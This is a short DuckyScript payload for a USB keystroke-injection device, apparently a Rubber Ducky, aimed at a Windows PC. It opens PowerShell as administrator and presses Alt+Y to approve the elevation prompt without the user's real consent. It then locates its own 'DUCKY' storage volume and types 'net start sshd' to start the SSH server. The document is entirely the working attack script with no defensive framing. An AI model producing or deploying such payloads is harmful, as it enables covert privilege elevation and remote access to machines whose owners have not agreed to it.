REM this payload simply starts the ssh service on a windows pc using automated changeattack mode to open a powershell as admin
DELAY 3000

ATTACKMODE HID


ATTACKMODE HID STORAGE


REM Admin Powershell instance created in DUCKY script and on current machine

GUI R
DELAY 600
STRING powershell
DELAY 600
CTRL SHIFT ENTER
DELAY 600
ALT Y
DELAY 600
STRING cd \
DELAY 600
ENTER
DELAY 600
STRING $Ducky = Get-Volume -FileSystemLabel 'DUCKY' | % DriveLetter
ENTER
DELAY 600

$_JITTER_ENABLED = TRUE

DELAY 1200
STRING net start sshd
DELAY 1200
ENTER 
DELAY 300
